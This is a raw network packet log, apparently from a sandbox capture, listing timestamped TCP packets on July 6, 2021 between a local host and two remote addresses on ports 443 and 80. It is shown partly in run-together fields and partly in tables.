                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.705984116 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.706008911 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.706202030 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.707760096 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.707783937 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.707969904 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.725461006 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.764098883 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.764409065 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.973751068 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.007927895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.008048058 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.190449953 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.229113102 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.341574907 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.341612101 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.341634989 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.341655016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.341727018 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.344116926 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.344173908 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.344213009 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.344213963 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.344249010 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.344312906 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.431503057 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.431535006 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.431591034 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.431930065 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.431953907 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.432188034 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.433500051 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.433525085 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.433609962 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.434109926 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.434134007 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.434303045 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.435224056 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.435256958 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.435405016 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.436279058 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.436306953 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.436417103 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.437838078 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.437866926 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.437959909 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.438404083 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.438441992 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.438613892 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.439771891 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.439801931 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.440071106 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.440644979 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.440675020 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.440732956 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.441910028 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.521600962 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.521646976 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.521763086 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.522356033 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.522383928 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.522490978 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.523036957 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.523068905 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.523153067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.523901939 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.523924112 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.524255037 CEST49170443192.168.2.2213.224.92.73
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jul 6, 2021 17:02:24.524992943 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.525018930 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.525536060 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.526442051 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.526472092 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.526532888 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.527389050 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.527412891 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.527504921 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.611989021 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.612009048 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.612323999 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.612344027 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.612387896 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.612402916 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.612606049 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.612627029 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.612921953 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.613886118 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.613935947 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.615149021 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.615348101 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.615394115 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.615684986 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.616187096 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.616208076 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.616862059 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.616956949 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.616977930 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.617069960 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.617949009 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.617971897 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.618083000 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.620003939 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.620034933 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.620152950 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.620357037 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.620378971 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.620573044 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.621413946 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.621438980 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.621503115 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.622684956 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.622709990 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.623425961 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.623558998 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.623584986 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.623912096 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.624480963 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.701199055 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.701231003 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.701503992 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.701575994 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.701596975 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.701965094 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.703212023 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.703243017 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.703358889 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.705741882 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.705849886 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.705877066 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.705899000 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.705920935 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.705945015 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.705981016 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.705996990 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.707318068 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.707469940 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.791671038 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.791707993 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.792007923 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.792176962 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.792196035 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.792284012 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.792576075 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.792598009 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.792759895 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.793567896 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.793587923 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.793754101 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.794348955 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.794369936 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.795367956 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.795430899 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.795450926 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.797408104 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.797435045 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.797470093 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.797497988 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.797521114 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.797576904 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.797873020 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.799524069 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.799551964 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.801554918 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.801614046 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.801661968 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.801815987 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.801843882 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.802165031 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.804477930 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.804529905 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.804567099 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.804596901 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.804631948 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.805548906 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.880538940 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.880590916 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.880767107 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.881045103 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.881078959 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.881165028 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.882855892 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.882894039 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.883179903 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.883205891 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.883250952 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.883317947 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.884360075 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.884407997 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.884960890 CEST  49170        443        192.168.2.22   13.224.92.73
Jul 6, 2021 17:02:24.885457039 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.885483027 CEST  443          49170      13.224.92.73   192.168.2.22
Jul 6, 2021 17:02:24.885639906 CEST  49170        443        192.168.2.22   13.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.887229919 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.887283087 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.887573957 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.888971090 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889010906 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889229059 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889451027 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889484882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889585972 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889595985 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889612913 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.889689922 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.890558004 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.890582085 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.890659094 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.891679049 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.891706944 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.891753912 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.892786980 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.892808914 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.892875910 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.893806934 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.915877104 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.971398115 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.971422911 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.971632004 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972678900 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972722054 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972750902 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.972779036 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.973638058 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.973867893 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.973891973 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.974328041 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975905895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975935936 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975956917 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.975977898 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.976100922 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.977652073 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.977739096 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.977955103 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.978118896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.978167057 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.978205919 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.979255915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.979363918 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.979408979 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.980470896 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.980535030 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.980843067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.981363058 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.981399059 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.981446981 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.982409000 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.982467890 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.982527971 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.983371019 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.983397961 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.983504057 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:24.984519005 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060570002 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060607910 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060731888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060754061 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060811043 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.060910940 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.061656952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.061675072 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.061877966 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.063251972 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.063280106 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.063519001 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064069033 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064094067 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064193010 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064915895 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064939976 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.064979076 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.066032887 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.066068888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.066119909 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.067262888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.067289114 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.067339897 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.068294048 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.068317890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.068384886 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.069570065 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.069591045 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.069667101 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.070322990 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.070346117 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.070436001 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.073602915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.261204958 CEST4917180192.168.2.22172.67.213.115
Jul 6, 2021 17:02:25.284188986 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:02:25.299359083 CEST | 80 | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:02:25.300048113 CEST | 49171 | 80 | 192.168.2.22 | 172.67.213.115
Jul 6, 2021 17:02:25.300074100 CEST | 49171 | 80 | 192.168.2.22 | 172.67.213.115
Jul 6, 2021 17:02:25.338785887 CEST | 80 | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:02:25.828568935 CEST | 80 | 49171 | 172.67.213.115 | 192.168.2.22
Jul 6, 2021 17:02:25.828596115 CEST | 80 | 49171 | 172.67.213.115 | 192.168.2.22
